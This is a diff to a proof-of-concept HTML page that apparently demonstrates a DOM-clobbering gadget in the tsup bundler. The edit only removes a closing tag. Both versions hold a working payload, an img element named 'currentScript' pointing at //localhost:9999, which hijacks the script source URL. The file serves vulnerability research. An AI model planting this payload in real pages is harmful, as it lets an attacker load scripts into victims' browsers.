--- a/domc-gadgets-assets/gadgets/tsup/poc.html
+++ b/domc-gadgets-assets/gadgets/tsup/poc.html
@@ -22,8 +22,8 @@
 <section class="section">
   <div class="column">
   <p><span class="label">Payload</span><br><br>
-  <pre>&lt;img name=&quot;currentScript&quot; src=&quot;//localhost:9999&quot;&gt;&lt;/img&gt;</pre>
-  <img name="currentScript" src="//localhost:9999"></img>
+  <pre>&lt;img name=&quot;currentScript&quot; src=&quot;//localhost:9999&quot;&gt;</pre>
+  <img name="currentScript" src="//localhost:9999">
   </div>
 </section>
 
